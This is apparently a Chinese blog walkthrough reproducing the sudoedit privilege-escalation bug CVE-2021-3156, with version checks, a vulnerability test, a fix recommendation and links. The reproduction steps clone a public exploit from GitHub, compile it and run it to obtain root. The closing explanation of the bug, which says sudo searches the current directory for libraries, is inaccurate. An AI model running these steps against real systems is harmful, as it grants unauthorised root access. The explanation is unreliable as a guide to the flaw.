sudoedit本地提权漏洞利用
sudoedit本地提权漏洞利用---CVE-2021-3156 漏洞复现<div><br></div><div><h1 id="cve-2021-3156-漏洞复现" style="margin-top: 10px; margin-bottom: 10px; font-size: 28px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">CVE-2021-3156 漏洞复现</h1><h3 id="漏洞简介" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">漏洞简介</h3><h3 id="漏洞简介" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。</p><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2),并且sudo支持的其他操作系统和Linux发行版也很容易受到攻击。</p></h3><h3 id="攻击效果" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">攻击效果</h3><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">漏洞发生的原因在于sudo错误地转义了参数中的反斜杠。</p></h3><h6 id="通常通过shellsudo--s或sudo--i运行命令行时sudo会转义特殊字符但--s-或--i-也可能被用来运行sudoedit在这种情况下实际上特殊字符没有被转义这就可能导致缓冲区溢出" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">通常,通过shell(sudo -s或sudo -i)运行命令行时,sudo会转义特殊字符。但 -s 或 -i 也可能被用来运行sudoedit,在这种情况下,实际上特殊字符没有被转义,这就可能导致缓冲区溢出。</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">利用该漏洞,研究人员在多个Linux发行版上成功获得了完整的root权限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2)。并且,Qualys认为,在这种情况下,sudo支持的其他操作系统和Linux发行版也很容易受到攻击,并不能排除风险。</p></h3><h3 id="受影响版本" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">受影响版本</h3><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">Sudo 1.8.2 – 1.8.31p2<br>Sudo 1.9.0 – 1.9.5p1</p></h3><h3 id="不受影响版本" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">不受影响版本</h3><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">sudo =>1.9.5p2</p></h3><h3 id="漏洞复现" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">漏洞复现</h3><h6 id="1-查看linux及sudo版本" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">1 查看Linux及sudo版本</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">lsb_release -a<br>sudo -V<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195117456-545998283.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h6 id="2-简单测试漏洞是否存在" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">2 简单测试漏洞是否存在</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">sudoedit -s /<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195132900-1067190812.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h6 id="3-如果返回sudoedit开头的错误则当前系统可能存在安全风险" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">3 如果返回“sudoedit:开头的错误”,则当前系统可能存在安全风险;</h6><h6 id="不受影响的系统将显示usage开头的错误" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">不受影响的系统将显示“usage:开头的错误”。</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;"><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195228657-1068567000.png" alt="image" loading="lazy" style="border: none; max-width: 800px; height: auto;"></p></h3><h6 id="4-下载exp" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">4 下载exp</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">git clone <a href="https://github.com/blasty/CVE-2021-3156.git" target="_blank" style="color: rgb(0, 0, 0);">https://github.com/blasty/CVE-2021-3156.git</a><br>cd CVE-2021-3156<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195243339-625828107.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h6 id="5-编译exp" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">5 编译exp</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">make<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195257111-1789964871.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h6 id="6-添加执行权限" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">6 添加执行权限</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">chmod a+x sudo-hax-me-a-sandwich<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195308418-1748008937.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h6 id="7-exp提权测试" style="margin-top: 10px; margin-bottom: 10px; font-size: 11px; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">7 exp提权测试</h6><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">./sudo-hax-me-a-sandwich 0<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195341843-435173744.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"><br>提权成功啦!!!!<br><img src="https://img2020.cnblogs.com/blog/2173858/202104/2173858-20210427195808228-1747835000.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h3 id="参考文献" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">参考文献</h3><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">信息安全漏洞门户网 :<a href="http://cve.scap.org.cn/" target="_blank" style="color: rgb(0, 0, 0);">http://cve.scap.org.cn/</a></p></h3><h3 id="修复建议" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">修复建议</h3><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护。<br>下载地址:<a href="https://www.sudo.ws/download.html" target="_blank" style="color: rgb(0, 0, 0);">https://www.sudo.ws/download.html</a><br><img src="https://img2020.cnblogs.com/blog/2173858/202105/2173858-20210510112521566-980443953.png" alt="image" loading="lazy" class="medium-zoom-image" style="border: none; max-width: 800px; cursor: zoom-in; height: auto; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p></h3><h3 id="个人理解" style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;">个人理解</h3><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; line-height: 1.5; color: rgb(51, 51, 51); font-family: "PingFang SC", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif;"><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">sudo执行时本来应该在/usr/lib下搜索动态库,结果这货优先在执行命令的位置搜索,所以这个时候就在编译一个动态态库在当前目录,里边主要就是跳过用户密码验证,直接返回true</p><p style="margin: 10px auto; font-size: 14px; font-weight: 400;"><br></p><p style="margin: 10px auto; font-size: 14px; font-weight: 400;">来源:https://www.cnblogs.com/20181309lzy/p/14710439.html</p></h3></div>
页:
[1]